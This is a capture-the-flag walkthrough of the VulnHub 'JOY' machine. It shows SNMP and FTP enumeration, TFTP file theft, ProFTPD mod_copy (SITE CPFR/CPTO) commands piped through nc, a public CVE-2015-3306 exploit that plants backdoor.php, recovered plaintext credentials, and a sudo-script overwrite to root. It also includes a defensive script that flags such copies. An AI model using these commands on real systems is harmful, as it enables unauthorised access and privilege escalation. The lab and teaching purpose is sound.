| Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
| IP address: 10.88.42.136 Netmask: 255.255.255.0
| MAC address: 00:0c:29:32:a4:6a (VMware)
| Type: ethernetCsmacd Speed: 1 Gbps
|_ Traffic stats: 89.38 Mb sent, 241.11 Mb received
| snmp-netstat: 
| TCP 0.0.0.0:21 0.0.0.0:0
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:25 0.0.0.0:0
| TCP 0.0.0.0:110 0.0.0.0:0
| TCP 0.0.0.0:139 0.0.0.0:0
| TCP 0.0.0.0:143 0.0.0.0:0
| TCP 0.0.0.0:445 0.0.0.0:0
| TCP 0.0.0.0:465 0.0.0.0:0
| TCP 0.0.0.0:587 0.0.0.0:0
| TCP 0.0.0.0:993 0.0.0.0:0
| TCP 0.0.0.0:995 0.0.0.0:0
| TCP 127.0.0.1:631 0.0.0.0:0
| TCP 127.0.0.1:3306 0.0.0.0:0
| UDP 0.0.0.0:68 *:*
| UDP 0.0.0.0:123 *:*
| UDP 0.0.0.0:137 *:*
| UDP 0.0.0.0:138 *:*
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:631 *:*
| UDP 0.0.0.0:1900 *:*
| UDP 0.0.0.0:5353 *:*
| UDP 0.0.0.0:36969 *:*
| UDP 0.0.0.0:42070 *:*
| UDP 0.0.0.0:51704 *:*
| UDP 10.88.42.136:123 *:*
| UDP 10.88.42.136:137 *:*
| UDP 10.88.42.136:138 *:*
| UDP 10.88.42.255:137 *:*
| UDP 10.88.42.255:138 *:*
|_ UDP 127.0.0.1:123 *:*
| snmp-processes: 
...
| 754: 
| Name: in.tftpd
| Path: /usr/sbin/in.tftpd
| Params: --listen --user tftp --address 0.0.0.0:36969 --secure /home/patrick
...

FTP – Anonymous FTP

Since anonymous FTP is active and there are files to grab, I decided to grab them all. I’m not sure what the best tool is, but I’ve always used the lftp client to mirror FTP contents.

mkdir ftp
cd ftp
lftp -u anonymous,anonymous -e 'mirror;quit' 10.88.42.136

FTP – FILES

.
./download
./upload
./upload/project_yolo
./upload/project_malindo
./upload/project_woranto
./upload/project_flamingo
./upload/project_bravado
./upload/project_luyano
./upload/project_komodo
./upload/project_desperado
./upload/reminder
./upload/project_okacho
./upload/directory
./upload/project_toto
./upload/project_sicko
./upload/project_zoo
./upload/project_vivino
./upload/project_armadillo
./upload/project_polento
./upload/project_indigo
./upload/project_uno
./upload/project_emilio
./upload/project_ronaldinho

FTP – upload/directory

More confirmation that patrick is a user on the system. It also seems like this is /home/patrick (previously mentioned in the process listing via SNMP).

Patrick's Directory

total 128
drwxr-xr-x 18 patrick patrick 4096 Jun 16 20:10 .
drwxr-xr-x 4 root root 4096 Jan 6 2019 ..
-rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history
-rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc
drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache
drwx------ 10 patrick patrick 4096 Dec 26 2018 .config
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents
drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads
drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg
-rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha
-rw-r--r-- 1 patrick patrick 0 Jun 16 19:50 HmjhT4RkfTh7RIMfqMJWMphRts7EwVJL.txt
-rw-r--r-- 1 patrick patrick 0 Jun 16 19:45 IBrat9JjUMGHJtVsAUfc0CLW3LEP4M15.txt
-rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority
drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local
drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music
drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano
-rw-r--r-- 1 patrick patrick 24 Jun 16 19:45 p2pIHflvQpgys7Io9W7E33H4uFmzwHJpPgViBOlLBHDxi0zqJcrZObfDqPBG6GQ5.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures
-rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public
-rw-r--r-- 1 patrick patrick 24 Jun 16 20:05 qNdejbhnSVcWpNVgYQvrq52kACwqgDUiyvo8Q5JgTZ1dvHcHOGpzFuEqC387wCWx.txt
-rw-r--r-- 1 patrick patrick 24 Jun 16 20:00 QrHTw7iuO4JCToijShVuQMrFcReSv9YV435E3niEYbFmoT50vikNjbsKuqgPGWot.txt
d--------- 2 root root 4096 Jan 9 2019 script
-rw-r--r-- 1 patrick patrick 24 Jun 16 19:50 sh5lebDMlsOns3I7sF7mnHqj5zbuJv9EMc60nGmmUbJOv6tJrDzSRsvJNeoiB0el.txt
-rw-r--r-- 1 patrick patrick 0 Jun 16 20:05 soqjRoS2by1apdqTErDEQTspl2YuWgva.txt
drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt
-rw-r--r-- 1 patrick patrick 0 Jun 16 20:10 U1wNlhsloNt2AHXJZPs9Xi0rIj0gmazP.txt
-rw-r--r-- 1 patrick patrick 24 Jun 16 19:55 u42rsGynarnocbP6FwTiFmnwmLLiHcCQTitVqbHnYYX28K4t43oqp3vjXdSQdbeQ.txt
-rw-r--r-- 1 patrick patrick 0 Jun 16 20:00 uxXpvjuUYMGKvOEDaCFfUFhTmvcvWcm0.txt
-rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos
-rw-r--r-- 1 patrick patrick 0 Jun 16 19:55 xXATmw8ZuarOVbYrxznrcKrPJdYRchUI.txt
-rw-r--r-- 1 patrick patrick 24 Jun 16 20:10 ZxjEw0BVqBxx4KpJ4oDwRvOUbrRVYh8H50OIZyAE47jdGvuBFbIr25hTqvFg1cbL.txt

You should know where the directory can be accessed.

Information of this Machine!
Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux

What I Did Before UDP Scan Finished

Dropbear SSH Exploit Attempt

I wasted too much time getting tunnel vision on trying to exploit dropbear ssh (there’s an old exploit I spent time trying to get to work). It ultimately wasn’t fruitful. There’s an entry in searchsploit for it (exploits/linux/remote/387.c).

ProFTPD Exploit Attempt

I spent time on a searchsploit-provided exploit (exploits/linux/remote/36803.py), but it requires the web directory. I did learn about the CPFR and CPTO commands. I should have tried to use them to get patrick’s files. I’ll show it after the TFTP method (likely the intended method).

What We Now Know

  • patrick is a system user
  • patrick’s home directory is /home/patrick
  • we have a list of patrick’s files that are likely in /home/patrick
  • TFTP is serving /home/patrick

TFTP – Getting Patrick’s Files

Now we need to grab each of patrick’s files from TFTP using the file list. Be sure to remove “.” and “..” from the list of files.

awk '/[0-9] /{print $9}' ftp/upload/directory > patrick_files.txt
# remove . and .. from patrick_files.txt
mkdir tftp
cd tftp
for file in `cat ../patrick_files.txt`; do echo -e "get $file\nquit\n"|tftp 10.88.42.136 36969; done
for i in *; do echo ">> $i <<" && cat $i; done
>> Desktop <<
>> Documents <<
>> Downloads <<
>> haha <<
>> HmjhT4RkfTh7RIMfqMJWMphRts7EwVJL.txt <<
>> IBrat9JjUMGHJtVsAUfc0CLW3LEP4M15.txt <<
>> Music <<
>> p2pIHflvQpgys7Io9W7E33H4uFmzwHJpPgViBOlLBHDxi0zqJcrZObfDqPBG6GQ5.txt <<
Patrick is hardworking!
>> Pictures <<
>> Public <<
>> qNdejbhnSVcWpNVgYQvrq52kACwqgDUiyvo8Q5JgTZ1dvHcHOGpzFuEqC387wCWx.txt <<
Patrick is hardworking!
>> QrHTw7iuO4JCToijShVuQMrFcReSv9YV435E3niEYbFmoT50vikNjbsKuqgPGWot.txt <<
Patrick is hardworking!
>> script <<
>> sh5lebDMlsOns3I7sF7mnHqj5zbuJv9EMc60nGmmUbJOv6tJrDzSRsvJNeoiB0el.txt <<
Patrick is hardworking!
>> soqjRoS2by1apdqTErDEQTspl2YuWgva.txt <<
>> Sun <<
>> Templates <<
>> U1wNlhsloNt2AHXJZPs9Xi0rIj0gmazP.txt <<
>> u42rsGynarnocbP6FwTiFmnwmLLiHcCQTitVqbHnYYX28K4t43oqp3vjXdSQdbeQ.txt <<
Patrick is hardworking!
>> uxXpvjuUYMGKvOEDaCFfUFhTmvcvWcm0.txt <<
>> version_control <<
Version Control of External-Facing Services:

Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12

We should switch to OpenSSH and upgrade ProFTPd.

Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
>> Videos <<
>> x86_64 <<
>> xXATmw8ZuarOVbYrxznrcKrPJdYRchUI.txt <<
>> ZxjEw0BVqBxx4KpJ4oDwRvOUbrRVYh8H50OIZyAE47jdGvuBFbIr25hTqvFg1cbL.txt <<
Patrick is hardworking!

FTP – Getting Patrick’s Files

We can use the CPFR and CPTO trick to put patrick’s files in the upload directory. Be sure to remove . and .. from the file list, or you could fill up the hard disk (yes, I did it). This takes some guesswork if you don’t know where the FTP directory is, but I guessed/knew it was /home/ftp.

for file in `cat patrick_files.txt`; do echo -e "site cpfr /home/patrick/$file\nsite cpto /home/ftp/upload/$file\nquit"|nc 10.88.42.136 21; done
cd ftp && lftp -u anonymous,anonymous -e 'mirror;quit' 10.88.42.136; cd -

Exploiting ProFTPD

We now know the web directory is /var/www/tryingharderisjoy, which is the last piece of information we needed to try the proftpd exploit.

I tried the exploit in searchsploit, but it didn’t work. So I went looking on the web and found https://github.com/t0kx/exploit-CVE-2015-3306/, which works!

[18:10:35]🔥root[ /home/kali/VulnHub/joy ]# python3 exploit.py 
usage: exploit.py [-h] --host HOST --port PORT --path PATH
exploit.py: error: the following arguments are required: --host, --port, --path
[18:10:40]🔴->2 root[ /home/kali/VulnHub/joy ]# python3 exploit.py --host 10.88.42.136 --port 21 --path /var/www/tryingharderisjoy
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 10.88.42.136:21
[+] Target exploited, acessing shell at http://10.88.42.136/backdoor.php
[+] Running whoami: www-data
[+] Done
[18:11:30]🔥root[ /home/kali/VulnHub/joy ]#
http://10.88.42.136/backdoor.php?cmd=COMMAND_HERE

“which nc” returns nothing, so netcat isn’t installed. So, I went back to http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet to see the reverse shell options again.

I tried the bash one, and it didn’t work. So I went to CyberChef to url encode the bash reverse shell.

I tried the PHP one (since I know PHP is installed), and it did work. I also went to CyberChef to url encode the PHP reverse shell.

[Screenshot: Digitalworld local joy initialshell]

Pivot to the Patrick User

Looking around, the ossec directory is there, so I looked inside of it. There’s a suspect file, “patricksecretsofjoy,” and it contains patrick’s password.

[email protected]:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy 
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis

how would these hack3rs ever find such a page?
[email protected]:/var/www/tryingharderisjoy/ossec$
patrick:apollo098765

I tried to ssh in, but that didn’t work.

[email protected]:~$ ssh patrick@10.88.42.136
Unable to negotiate with 10.88.42.136 port 22: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1

I could, fortunately, su to patrick.

[Screenshot: Digitalworld local joy supatrick]

Pivot to Root

There’s a sudo rule that runs a custom script. Unfortunately, I couldn’t edit or read the file directly.

[Screenshot: Digitalworld local joy patricksudo]

But I could replace its contents using the FTP CPFR/CPTO trick from earlier.

cd /dev/shm
echo -e '#!/bin/sh\nsh\n'>test
chmod +x test
echo -e "site cpfr /dev/shm/test\nsite cpto /home/patrick/script/test\nquit"|nc 10.88.42.136 21
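Both uses of the SITE CPFR/CPTO trick on this box (pulling patrick’s files into the upload directory earlier, and overwriting the sudo script here) show up on the FTP control channel as a copy whose source or destination lies outside the FTP root. As an added example (not from the original post), the following audits a constructed (client, command) trace for exactly that; the FTP root and webroot are the paths the walkthrough established, and the password in the trace is a placeholder.

```python
import posixpath
from typing import Dict, List, Tuple

FTP_ROOT = "/home/ftp"                    # the FTP directory guessed above
WEB_ROOT = "/var/www/tryingharderisjoy"   # webroot from patrick's version_control note

# Constructed control-channel trace as (client, command) pairs, not from the
# post: an anonymous session doing the copies the walkthrough relies on, then
# an authenticated copy that stays inside the FTP root.
SAMPLE_TRACE: List[Tuple[str, str]] = [
    ("10.88.42.133", "USER anonymous"),
    ("10.88.42.133", "PASS anonymous"),
    ("10.88.42.133", "SITE CPFR /home/patrick/version_control"),
    ("10.88.42.133", "SITE CPTO /home/ftp/upload/version_control"),
    ("10.88.42.133", "SITE CPFR /home/ftp/upload/notes.txt"),
    ("10.88.42.133", "SITE CPTO /var/www/tryingharderisjoy/backdoor.php"),
    ("10.88.42.133", "SITE CPFR /dev/shm/test"),
    ("10.88.42.133", "SITE CPTO /home/patrick/script/test"),
    ("10.88.42.140", "USER patrick"),
    ("10.88.42.140", "PASS placeholder"),
    ("10.88.42.140", "SITE CPFR /home/ftp/upload/a.txt"),
    ("10.88.42.140", "SITE CPTO /home/ftp/upload/../upload/b.txt"),
]


def inside(path: str, root: str) -> bool:
    """True if path, after normalising '..' segments, is root or beneath it."""
    norm = posixpath.normpath(path)
    root = root.rstrip("/")
    return norm == root or norm.startswith(root + "/")


def audit_site_copy(trace: List[Tuple[str, str]]) -> List[Dict]:
    """Pair each client's SITE CPFR with the following SITE CPTO and alert when
    the copy reads or writes outside the FTP root, or lands in the webroot."""
    sessions: Dict[str, Dict] = {}
    alerts: List[Dict] = []
    for client, cmd in trace:
        s = sessions.setdefault(client, {"user": "?", "cpfr": None})
        verb, _, arg = cmd.partition(" ")
        if verb.upper() == "USER":
            s["user"] = arg
            continue
        if verb.upper() != "SITE":
            continue
        sub, _, path = arg.partition(" ")
        if sub.upper() == "CPFR":
            s["cpfr"] = path
        elif sub.upper() == "CPTO" and s["cpfr"] is not None:
            src, dst, s["cpfr"] = s["cpfr"], path, None
            reasons = []
            if not inside(src, FTP_ROOT):
                reasons.append("source outside ftp root")
            if not inside(dst, FTP_ROOT):
                reasons.append("destination outside ftp root")
            if inside(dst, WEB_ROOT):
                reasons.append("destination in webroot")
            if reasons:
                alerts.append({"client": client, "user": s["user"], "src": src, "dst": dst,
                               "reasons": reasons,
                               "severity": "high" if s["user"].lower() == "anonymous" else "medium"})
    return alerts


if __name__ == "__main__":
    for a in audit_site_copy(SAMPLE_TRACE):
        print(a["severity"], a["user"], a["src"], "->", a["dst"], a["reasons"])
```

The lasting fix is the one patrick’s own version_control note asks for: upgrade ProFTPd, which removes the unauthenticated copy.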

Then I ran the sudo command and got a root shell.

[Screenshot: Digitalworld local joy patricksudotoroot]

Flag

[Screenshot: Digitalworld local joy rootflag]